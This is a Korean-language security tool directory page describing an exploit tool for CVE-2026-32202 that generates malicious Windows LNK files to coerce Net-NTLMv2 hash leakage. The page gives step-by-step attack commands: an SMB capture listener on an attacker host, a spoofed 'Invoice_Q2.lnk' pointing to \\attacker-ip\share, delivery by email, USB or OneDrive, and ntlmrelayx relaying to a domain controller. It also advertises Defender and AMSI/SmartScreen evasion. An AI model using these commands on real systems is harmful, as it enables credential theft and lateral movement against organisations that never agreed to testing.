Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-32202 — 악성 LNK 파일을 생성하여 Windows Shell UNC 처리 방식을 통해 Net-NTLMv2 해시를 강제로 추출하며, 승인된 레드 팀 운영을 위한 사용자 지정 SMB 리스너 및 릴레이 통합을 제공합니다. | Kitploit
도구/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Payload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

악성 LNK 파일을 생성하여 Windows Shell UNC 처리 방식을 통해 Net-NTLMv2 해시를 강제로 추출하며, 승인된 레드 팀 운영을 위한 사용자 지정 SMB 리스너 및 릴레이 통합을 제공합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

면책 조항

이 도구는 공인된 레드 팀 운영 및 침투 테스트 전용입니다.
명시적 허가 없이 시스템을 대상으로 한 무단 사용은 불법입니다.
사용에 따른 책임은 본인에게 있습니다. 저자는 오용이나 손상에 대해 어떠한 책임도 지지 않습니다.

설명
불완전한 Windows Shell 보호 우회(CVE-2026-32202)를 통한 NTLMv2 해시 강제 수집. 탐색기에서 열거나 미리 볼 때 SMB/UNC 인증을 강제하는 특수 제작된 LNK 파일을 생성합니다. 낮은 상호작용으로, 2026년 4월 패치가 불충분했던 패치 적용 시스템에서도 작동합니다. 실제 업무에 적극적으로 사용되고 있습니다.

주요 기능

  • 악성 LNK를 통한 제로 클릭 / 최소 상호작용 Net-NTLMv2 유출(탐색기 미리 보기 + 아이콘 해석 경로).
  • 해시 캡처용 커스텀 SMB 리스너(Responder 불필요, 더 깔끔한 로그).
  • ETW/Defender 탐지 범위를 줄인 안정적인 변형.
  • 부분적 AMSI/SmartScreen 우회 모드.
  • ntlmrelayx 릴레이 체인(SMB, LDAP, HTTP 등)에 바로 사용 가능.

익스플로잇이 하는 일
이 도구는 Target + IconEnvironmentDataBlock / ExtraData 구조에서 UNC 경로를 처리하는 Shell의 방식을 악용하는 정교한 .LNK 파일을 생성합니다. 피해자가 폴더를 탐색하거나 파일 위에 마우스를 올리거나 미리 보면, Windows Shell이 공격자가 제어하는 UNC로 SMB 연결을 시작하여 머신/사용자의 Net-NTLMv2 해시를 유출합니다. 대상에서 코드 실행은 없음 - 릴레이 또는 크래킹을 위한 자격 증명 강제 수집입니다.

유용한 이유

  • 내부 침투 테스트 / 레드 팀 운영에서 빠른 초기 접근(특히 피싱이 제한된 에어갭 또는 강화된 환경).
  • 고가치 대상(DC, 파일 서버, Exchange, ADCS 등)으로의 NTLM 릴레이에 적합.
  • 기존 Responder가 차단되거나 노이즈가 많은 환경에서도 작동.
  • Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025에서 높은 성공률(아래 테스트 빌드).

테스트 환경

  • Windows 11 24H2(빌드 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025(코어 + 데스크톱 경험)
  • 2026년 4월 누적 업데이트 이후 부분적으로 유효(불완전한 패치가 실제 환경에서 확인됨).

의존성 설치: pip install -r requirements.txt

사용법

root@kitploit:~
# 1. 캡처 서버 시작(공격자 호스트)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. 악성 LNK 생성
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# 선택 사항: 안정 모드 또는 우회 모드
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. LNK 전달(USB, 공유 폴더, 이메일 첨부, OneDrive 등)

# 4. 터미널 및 파일에서 해시 대기. 릴레이 예시:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# 또는 RBCD용 LDAP 릴레이, ADCS 인증서용 HTTP 릴레이 등

익스플로잇

href

제한 사항

  • 피해자가 해당 폴더와 상호작용해야 함(탐색기 미리 보기/호버로 충분한 경우가 많음).
  • 최신 네트워크 세분화 + SMB 서명 + NTLM 제한으로 릴레이 성공률이 낮아짐.
  • 완전한 RCE가 아님 - 자격 증명 자료만 획득.
  • 패치 상태가 중요함; 2026년 4월 이후 완전히 업데이트된 시스템은 우회 변형이 필요할 수 있음.

근본 원인(요약)
LNK 아이콘/대상 해석을 위한 Windows Shell의 UNC 경로 정규화 및 ExtraData 블록 처리의 불완전한 수정. 무단 네트워크 스푸핑을 차단하기 위한 보호 메커니즘이 Shell 네임스페이스 열거 중에도 여전히 NTLM 인증을 트리거합니다.

도구 다운로드